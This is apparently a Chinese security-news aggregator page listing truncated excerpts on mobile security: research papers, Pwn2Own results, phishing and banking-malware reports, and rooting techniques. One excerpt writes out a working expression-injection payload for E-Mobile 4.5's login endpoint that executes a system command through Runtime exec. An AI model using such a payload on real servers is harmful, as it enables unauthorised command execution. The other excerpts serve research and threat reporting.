记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

An Empirical Study of Web Resource Manipulation in Real-world Mobile Applications

出处:USENIX Security 2018 作者:Xiaohan Zhang, Yuan Zhang, Min Yang, Xiaofeng Wang, Long Lu, Haixin Duan 单位:School of Computer Science, Fudan University, Shanghai Institute of Intelligent Electronics & Systems, Shanghai Institute for Advanced Communication and Data Science, Shanghai Key Laboratory of Data Science, Fudan University, Indiana University Bloomi
发布时间:2018-12-11 19:25 | 阅读:86926 | 评论:0 | 标签:mobile

Understanding Cross App Remote Infections on Mobile Webviews

作者:Tongxin Li, Xinhui Han, Xueqiang Wang, Mingming Zha, Kai Chen, XiaoFeng Wang, Luyi Xing, Nan Zhang, Xiaolong Bai 单位:Peking University, Indiana University Bloomington, Institute of Information Engineering, Chinese Academy of Sciences, Indiana University Bloomington, Tsinghua University 出处:CCS 2017 论文:https://www.informatics.indiana.edu/xw7/papers/p829-l
发布时间:2018-12-10 19:25 | 阅读:82728 | 评论:0 | 标签:mobile

Finding Clues for Your Secrets: Semantics-Driven, Learning-Based Privacy Discovery in Mobile Apps

Yuhong Nan, Zhemin Yang, Xiaofeng Wang, Yuan Zhang, Donglai Zhu and Min Yang School of Computer Science, Fudan University Shanghai Insitute of Intelligent Electro ics & Systems § Shanghai Institute for Advanced Communication and Data Science Shanghai Key Laboratory of Data Science Indiana University Bloomington {nanyuhong, yangzhemin, yuanxzhang, zhudl
发布时间:2018-07-03 19:25 | 阅读:103810 | 评论:0 | 标签:mobile

利用个性化配置辨识移动设备(Fingerprinting Mobile Devices)

作者:{Persist}@ArkTeam 原文作者:Andreas Kurtz*, Hugo Gascon, Tobias Becker, Konrad Rieck, and Felix Freiling 原文题目:Fingerprinting Mobile Devices Using Personalized Configurations 原文来源:Proceedings on Privacy Enhancing Technologies 最近,苹果禁止了对硬件标识符的访问,这些标识符经常用被第三方应用来追踪用户,本文研究出了一种在此情况下利用个性化配置仍然可以唯一辨识用户的方法,本实验是面向iOS平台的,本文寻找了29个不同的配置特点(见图1)去计算用户”指纹(FingerPrinti
发布时间:2018-03-30 18:15 | 阅读:164699 | 评论:0 | 标签:ArkDemy 移动 mobile

Mobile Pwn2Own 2017:趋势科技颁出51.5万美元奖金

东京举行的2017移动Pwn2Own大会上,展现了Pwn2Own竞赛史上最长漏洞利用链,安全研究人员采用11个不同漏洞在三星Galaxy S8系统中执行代码。11月2日,今年移动Pwn2Own黑客竞赛的第二天,大波漏洞利用涌现,包括Pwn2Own史上最长漏洞利用链。2017移动Pwn2Own大赛于11月1日至2日在日本东京举行,披露了32个漏洞,涉及苹果、三星和华为的移动设备。为期2天的赛事结束,主办方趋势科技的零日计划(ZDI)共颁出了51.5万美元的奖金。ZDI已私下向受影响厂商通报了所有这些漏洞,以便问题能得到修复。大赛亮点之一,是MWR实验室演示针对三星Galaxy S8及其默认浏览器的超复杂漏洞利用。MWR实验室共用了Galaxy S8上6个应用中的11个不同漏洞,得以在该设备上执行任意代码,并渗漏潜
发布时间:2017-11-06 19:10 | 阅读:165150 | 评论:0 | 标签:行业动态 奇虎360 安全漏洞 漏洞奖金 移动Pwn2Own 腾讯科恩安全实验室 mobile

任何使用jQuery Mobile网站中都存在一个尚未修复的XSS漏洞

任何使用jQuery Mobile网站中都存在一个尚未修复的XSS漏洞,根据国外媒体的最新报道,谷歌公司的安全工程师Eduardo Vela在jQuery Mobile框架中发现了一个安全漏洞,这个漏洞将会让 所有使用了jQuery Mobile的网站暴露于跨站脚本攻击风险之下 。安全客小百科:jQuery MobilejQuery Mobile项目(jQuery框架中的一个组件)是一个基于HTML5的开发框架,在它的帮助下,开发者可以设计出能够适配目前主流移动设备和桌面系统的响应式Web站点以及应用程序。实际上,jQuery Mobile不仅可以为主流移动平台提供jQuery的核心库,而且它也是一个较为完整统一的jQuery移动UI框架。根据jQuery开发团队的介绍,目前全球范围内大约有十五万个活动站点是采
发布时间:2017-02-14 05:45 | 阅读:118181 | 评论:0 | 标签:xss 漏洞 mobile

安天移动安全&中国电信云堤联合报告《Dark Mobile Bank之钓鱼篇》

一、威胁趋势 在电商购物、移动支付盛行的今天,网络钓鱼也发生了新的变化,不仅有传统的网站欺骗,还发展出移动平台钓鱼的新方式。相对于传统诈骗,移动平台的钓鱼手段更加恶劣,带来的经济损失也更为惨重。 作为移动威胁的一部分,移动钓鱼攻击已成为手机用户的重要威胁。经过三年多的发展变化,移动钓鱼攻击的技术及手段更加成熟。移动威胁最直接的受害群体是普通的个人用户,诈骗电话、钓鱼短信、手机病毒已经成为危害用户手机安全的主要威胁,其中针对个人用户的移动威胁当前主要是借助于伪基站钓鱼短信传播恶意代码;同时通讯信息诈骗犯罪持续高发,媒体也公开披露过多起致人死亡或涉案金额巨大的电话诈骗案件。 2016年,网站系统的脱库、撞库攻击频繁发生,各类信息及数据泄露的安全事件依旧层出不穷,且愈演愈烈。黑产之手已经延伸到普通百姓生活,用户的隐私
发布时间:2017-02-13 22:05 | 阅读:127955 | 评论:0 | 标签:行业动态 移动安全 移动钓鱼 移动 mobile

安天移动安全&中国电信云堤联合报告《Dark Mobile Bank之钓鱼篇》

一、威胁趋势在信息安全链条中,技术、管理等因素极大威胁着信息安全,而人为因素则是其中最为薄弱的一个环节。正是基于这一点,越来越多的黑客转向利用人的弱点即社会工程学方法来实施网络攻击。利用社会工程学手段,突破信息安全防御措施的事件,已经呈现出上升甚至泛滥的趋势。网络钓鱼是社会工程学的一种形式,也是信息安全威胁中最久远、最常见的一种攻击方式。网络钓鱼历史悠久,其主要发展历程可以归纳如下:网钓技术最早于1987年问世首次使用“网钓”(phishing)这个术语是在1996年。该词是英文单词钓鱼(fishing)的变种之一,大概是受到“飞客”(phreaking)一词的影响,意味着放钱钓鱼以“钓”取受害人财务数据和密码2000年,通讯信息诈骗由台湾从沿海逐渐向内地发展,并迅速在国内发展蔓延2002年,著名黑客凯文·米特
发布时间:2017-02-13 19:45 | 阅读:140913 | 评论:0 | 标签:行业观点 AVL Insight移动威胁情报平台 AVL Team 中国电信 钓鱼网站 移动 mobile

安天移动安全&中国电信云堤联合报告《Dark Mobile Bank之钓鱼篇》

一、威胁趋势 在信息安全链条中,技术、管理等因素极大威胁着信息安全,而人为因素则是其中最为薄弱的一个环节。正是基于这一点,越来越多的黑客转向利用人的弱点即社会工程学方法来实施网络攻击。利用社会工程学手段,突破信息安全防御措施的事件,已经呈现出上升甚至泛滥的趋势。 网络钓鱼是社会工程学的一种形式,也是信息安全威胁中最久远、最常见的一种攻击方式。网络钓鱼历史悠久,其主要发展历程可以归纳如下: 网钓技术最早于1987年问世 首次使用“网钓”(phishing)这个术语是在1996年。该词是英文单词钓鱼(fishing)的变种之一,大概是受到“飞客”(phreaking)一词的影响,意味着放钱钓鱼以“钓”取受害人财务数据和密码 2000年,通讯信息诈骗由台湾从沿海逐渐向内地发展,并迅速在国内发展蔓延 2002年,著名黑
发布时间:2017-02-13 13:40 | 阅读:145181 | 评论:0 | 标签:安全报告 社工 移动 mobile

【国际资讯】任何使用jQuery Mobile网站中都存在一个尚未修复的XSS漏洞

【国际资讯】任何使用jQuery Mobile网站中都存在一个尚未修复的XSS漏洞 2017-02-12 10:44:08 来源:securityaffairs.co 作者:WisFree 阅读:2642次 点赞(0) 收藏 概述根据国外媒体的最新报道,
发布时间:2017-02-12 23:10 | 阅读:125961 | 评论:0 | 标签:xss 漏洞 mobile

Swords and Shields – a Study of Mobile Game Hacks and Existing Defenses

论文下载 分析mobile game hack的现状 Hacking Tools General Hacking Tools 通用的hacking tool分两类:memory editing (GameKiller, GameCIH, and GameGuardian); local file editing (CheatDroid) Specific Hacking Tools 还有一些为指定游戏设计的工具:例如Xmodgames,包含32个游戏的重打包版本,重打包的版本去除了原有的保护。 Analysis Techniques Traffic Analysis 通过中间人,网络代理等来修改一些关键网络数据(金币,分数等)。难点如下:首先需要强制让APP的网络数据走分析者的代理。之后数据可
发布时间:2016-12-30 01:30 | 阅读:108782 | 评论:0 | 标签:mobile

使用Dirty COW获取T-Mobile LG V20机型Root权限

自 LG 最新的旗舰手机 LG V20 发布以来,已经有一个多月了。作为 LG 全新推出的旗舰机,尽管有些 小小的不足,但仍然在亚马逊上的手机关注排行榜上,引起了诸多的关注。但就像我们使用其它大多数 Android 手机一样,如果我们想要更好的使用它,那么我们就必须取得它的 Root 权限! 但不幸的是,这款 LG 手机并不像之前的 LG 版本,可以通过 LGPU 的 KDZ 或者 TOT 来进行刷机,从而获取到 root 权限。这也就意味着,我们必须使用其它的方法,来完成 root 的操作!这里简单介绍下 KDZ 和 TOT:KDZ指的官方刷机包,因为官方刷机包的扩展名是KDZ。TOT是 LG 售后用的刷机包,和 kdz 是类似的,文件扩展名是tot。不过 TOT 不是官方对普通用户公开下载的。目前TOT有
发布时间:2016-12-14 12:25 | 阅读:983519 | 评论:0 | 标签:漏洞 终端安全 Android linux mobile

Drammer: Deterministic Rowhammer Attacks on Mobile Platforms

Victor van der Veen,Yanick Fratantonio,Daniel Gruss et al. Vrije Universiteit Amsterdam , CCS’16 论文下载 之前rowhammer的攻击要么是概率性的(ProjectZero),要么需要特殊的内存管理特性(KSM,THP)来把victim 数据放到会flip的物理地址上。这篇文章提出了利用android的内存管理接口来进行确定性的rowhammer攻击技术,不需要软件漏洞和权限的情况下进行root Rowhammer DRAM:row,rowbuffer,bank,refresh Double-sided rowhammer: sandwich 000000000 111111111
发布时间:2016-11-29 09:55 | 阅读:130118 | 评论:0 | 标签:mobile

Dark Mobile Bank之移动银行应用仿冒攻击威胁分析报告

一、背景        据“第十五次全国信息网络安全状况暨计算机和移动终端病毒疫情调查”调查结果显示,2015年移动终端的病毒感染比例为50.46%,相对于2014年增长了18.96%,移动终端病毒感染率涨幅较大,其主要原因在于不法分子瞄准手机支付用户群体,利用钓鱼网站、仿冒移动应用、移动互联网恶意程序、伪基站等多种手段,实施跨平台的欺诈和攻击。以下,安天AVL移动安全团队(以下简称AVL Team)将以银行用户为对象,针对仿冒钓鱼类攻击进行详尽的威胁分析并提出可采取的防范策略。二、威胁分析        为了提高欺诈和钓鱼的成功率,达到诱骗用户的攻击目的,攻击者采用了大量的各类伪装和仿冒技术,当前针对银行用户的仿冒攻击模式主要分为以下四种:钓鱼网站和短信、仿冒官方应用图标、仿冒官方应用程序名、仿冒官方应用界面
发布时间:2016-08-25 04:05 | 阅读:141214 | 评论:0 | 标签:行业观点 移动威胁情报 金融 银行 移动 mobile

神器而已之EMobile某版本表达式注入(命令执行)

code 区域版本:E-Mobile 4.5查看源码即可看到**.**.**.**/verifyLogin.dodata:loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${@[email protected] (@[email protected] ().exec('ipconfig').getInputStream())}code 区域其他案例http://**.**.**.**/verifyLogin.dodata: loginid=CasterJs&pass
发布时间:2016-07-14 04:05 | 阅读:99213 | 评论:0 | 标签:注入 mobile

高能预警:丹麦“支付宝”MobilePay被盯上了!

移动支付应用的发展不断地便捷人们的日常生活:购物不用再出门,上某宝就“购”了!朋友间转账更便捷,点点手指就搞定;吃饭还用带钱包?用移动支付工具,你的生活不再OUT!但是移动支付应用给人们带来便捷的同时也带来了极大的安全风险。如果要盗取你电子钱包中的钱财,攻击者一般需要进行哪几步操作?Step1.窃取移动支付应用的账号、密码Step2.窃听支付操作相关的短信验证码当攻击者顺利完成这两步时,你的电子钱包就岌岌可危啦!最近安天AVL移动安全和猎豹移动安全实验室共同截获的SlyRogue病毒,就可以完成以上操作……丹麦银行MobilePay是丹麦最大的移动支付平台,SlyRogue病毒则是一款针对MobilePay用户窃取该应用账户信息的病毒。该病毒十分狡猾,中毒手机一旦启动官方MobilePay应用,SlyRogue
发布时间:2016-06-29 06:50 | 阅读:111545 | 评论:0 | 标签:病毒播报 安全 支付 移动 mobile

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云